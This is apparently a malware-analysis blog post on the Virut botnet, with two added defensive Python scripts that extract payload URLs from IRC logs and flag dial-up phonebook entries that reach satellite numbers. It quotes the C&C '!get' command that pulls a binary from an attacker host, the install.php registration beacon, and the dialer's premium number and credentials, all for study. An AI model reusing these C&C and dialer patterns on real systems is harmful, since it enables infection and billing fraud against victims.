The saga of Virut continues
I decided to poke around Virut a bit more. I followed the IRC trail, and spotted the following:
USER u394876 . . :_
NICK ssajvgia
JOIN &virtu
:ssajvgia!~u394876@xxx.xxx.xx.xxx JOIN :&virtu
:* PRIVMSG ssajvgia :!get http://www.ircer.pl:XX/XX.gif
So, what we have here is the C&C server at proxima.ircgalaxy.pl commanding the new infectees, via a PRIVMSG carrying a !get command, to download a binary from www.ircer.pl.
Here is some info easily gleaned from the binary:
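To make the trail above easier to work with, here is an added example (my own code, not anything from the post or from the Virut authors) that parses raw IRC lines into prefix, command and parameters and pulls out the pieces an analyst cares about: the nick the bot registers, the channel it joins and every URL the C&C pushes with a !get command. The sample input is the post's own lines plus one constructed benign PRIVMSG, so that ordinary chatter is shown to be ignored; the IP stays masked as in the post.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

# Sample trail: the lines quoted in the post, plus one constructed benign
# PRIVMSG to show that ordinary chatter is not flagged.
SAMPLE_TRAIL = """\
USER u394876 . . :_
NICK ssajvgia
JOIN &virtu
:ssajvgia!~u394876@xxx.xxx.xx.xxx JOIN :&virtu
:someone!~u@host.example PRIVMSG ssajvgia :hi there, constructed noise line
:* PRIVMSG ssajvgia :!get http://www.ircer.pl:XX/XX.gif
"""

@dataclass
class IrcMessage:
    prefix: Optional[str]   # sender (nick!user@host, server name, or '*'), if any
    command: str
    params: List[str]       # middle params, then the trailing param if present

def parse_irc_line(line: str) -> IrcMessage:
    """Split a raw IRC line (RFC 1459 framing) into prefix, command and params.
    The trailing parameter after ' :' may contain spaces and is kept whole."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    return IrcMessage(prefix, params[0].upper(), params[1:])

# Bot command seen in the post: "!get <url>" pushed to the infectee by PRIVMSG.
GET_CMD = re.compile(r"^!get\s+(\S+)", re.IGNORECASE)

@dataclass
class TrailFindings:
    bot_nick: Optional[str] = None
    channels: List[str] = field(default_factory=list)
    download_urls: List[str] = field(default_factory=list)
    download_hosts: List[str] = field(default_factory=list)

def scan_irc_trail(lines) -> TrailFindings:
    """Walk the client/server lines and pull out the bot nick, the channels it
    joins and every URL the C&C orders it to fetch."""
    found = TrailFindings()
    for raw in lines:
        if not raw.strip():
            continue
        msg = parse_irc_line(raw)
        if msg.command == "NICK" and msg.params:
            found.bot_nick = msg.params[0]
        elif msg.command == "JOIN" and msg.params:
            # '&' channels are local to the server (RFC 1459), so a bot in one
            # only ever talks to peers on the same C&C host.
            for chan in msg.params[0].split(","):
                if chan not in found.channels:
                    found.channels.append(chan)
        elif msg.command == "PRIVMSG" and len(msg.params) >= 2:
            m = GET_CMD.match(msg.params[1])
            if m:
                url = m.group(1)
                found.download_urls.append(url)
                # only .hostname: the port is a masked placeholder here, and
                # urlparse(...).port would raise on a non-numeric value
                host = urlparse(url).hostname
                if host and host not in found.download_hosts:
                    found.download_hosts.append(host)
    return found

if __name__ == "__main__":
    r = scan_irc_trail(SAMPLE_TRAIL.splitlines())
    print("bot nick:", r.bot_nick)
    print("channels:", r.channels)
    print("payload URLs:", r.download_urls)
    print("download hosts:", r.download_hosts)
```

Feed it a full pcap-extracted IRC session and the download_hosts list is the set of payload servers to block; matching only on the trailing parameter, after proper framing, avoids false hits on a "!get" that merely appears inside a nick or channel name.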
File: XX.gif
Size: 36352
MD5: 9BA6B2B5A139369D77B695670FE63DC9
Packed with: [UPX v2.0 -> Markus, Laszlo & Reiser (h) SN:1308]
After unpacking the sample with the UPX command-line tool, the size expanded to 71680 bytes. The file is written in Delphi.
One of the file's functions is to modify the dial-up settings so that the entries point at the number 00881839150099. It also uses the username pol001 and password p07l88 for the connection. A quick search indicates that +881 8 is a prefix for Globalstar satellite phones.
The malware also registers itself with its creator(s) by requesting http://www.zief.pl/install.php?id=<unique id> with "MaxD" as the User-Agent.
An additional FSG-packed file is also dropped and executed.
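Checking a machine for this kind of dialer hijack means reading the RAS phonebook and looking at where each entry actually dials. Below is an added example (my own code, not from the post or the malware) that parses the INI-style rasphone.pbk layout and flags any entry whose number, after stripping the international access prefix, lands in a satellite network. It generalizes a little beyond the post: besides the Globalstar +881 8/9 block the post's number falls in, it also knows the Iridium, Thuraya and Inmarsat prefixes from the public numbering allocations. The SAMPLE_PBK text is constructed; only its hijacked number comes from the post. A number without an explicit +, 00 or 011 prefix is treated as local and never flagged, so a domestic number that happens to start with 870 or 881 is not a false positive.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed rasphone.pbk excerpt in the INI-style layout Windows uses for
# dial-up entries. "My ISP" has been rewritten to the number from the post;
# the other two entries are untouched.
SAMPLE_PBK = """\
[My ISP]
Encoding=1
Type=1
MEDIA=rastapi
Port=COM1
Device=Standard 56000 bps Modem
PhoneNumber=00881839150099
AreaCode=
CountryCode=1

[Backup dialup]
Type=1
MEDIA=rastapi
Device=Standard 56000 bps Modem
PhoneNumber=555 1000
CountryCode=1

[Office VPN]
Type=2
MEDIA=rastapi
PhoneNumber=vpn.example.net
"""

# Satellite / international-network prefixes (digits after the access prefix).
# +881 8 and +881 9 are Globalstar, as in the post; the others are the remaining
# satellite carriers a dialer might target, added for a more general check.
SATELLITE_PREFIXES: Dict[str, str] = {
    "8818": "Globalstar",
    "8819": "Globalstar",
    "8816": "Iridium",
    "8817": "Iridium",
    "88216": "Thuraya",
    "870": "Inmarsat",
}

def parse_pbk(text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Parse the phonebook into {entry: [(key, value), ...]}. A list is kept per
    entry because keys such as PhoneNumber may repeat (alternate numbers)."""
    entries: Dict[str, List[Tuple[str, str]]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            entries.setdefault(current, [])
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            entries[current].append((key.strip(), value.strip()))
    return entries

def normalize_number(number: str) -> Tuple[Optional[str], bool]:
    """Return (digits without the access prefix, had_international_prefix).
    Separators are dropped; a non-numeric target (e.g. a VPN host) gives None."""
    digits = re.sub(r"[\s\-().]", "", number)
    international = False
    for access in ("+", "00", "011"):      # 011 is the North American prefix
        if digits.startswith(access):
            digits, international = digits[len(access):], True
            break
    if not digits or not digits.isdigit():
        return None, international
    return digits, international

def classify_number(number: str) -> Optional[str]:
    """Name the satellite network a dialled number reaches, or None."""
    digits, international = normalize_number(number)
    if digits is None or not international:
        return None
    # longest prefix first so 88216 (Thuraya) wins over any shorter 882 match
    for prefix in sorted(SATELLITE_PREFIXES, key=len, reverse=True):
        if digits.startswith(prefix):
            return SATELLITE_PREFIXES[prefix]
    return None

def find_dialer_entries(pbk_text: str) -> List[Tuple[str, str, str]]:
    """Return (entry, number, network) for every entry dialling a satellite network."""
    hits = []
    for entry, kv in parse_pbk(pbk_text).items():
        for key, value in kv:
            if key.lower() == "phonenumber":
                network = classify_number(value)
                if network:
                    hits.append((entry, value, network))
    return hits

if __name__ == "__main__":
    for entry, number, network in find_dialer_entries(SAMPLE_PBK):
        print(f"{entry!r} dials {number} ({network})")
```

On NT-family Windows the phonebooks to feed this are the per-user and all-users rasphone.pbk under the Network\Connections\Pbk profile directories (path taken from Windows XP; check your own version); the stored credentials live outside the pbk, so the pol001/p07l88 pair from the post would have to be looked for separately.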
So, it seems that the person(s) behind this are running at least 3 domains:
ircer.pl
ircgalaxy.pl
zief.pl
and on top of that, the infectees are getting hit with the bills they'll receive for the calls to the satellite phone number.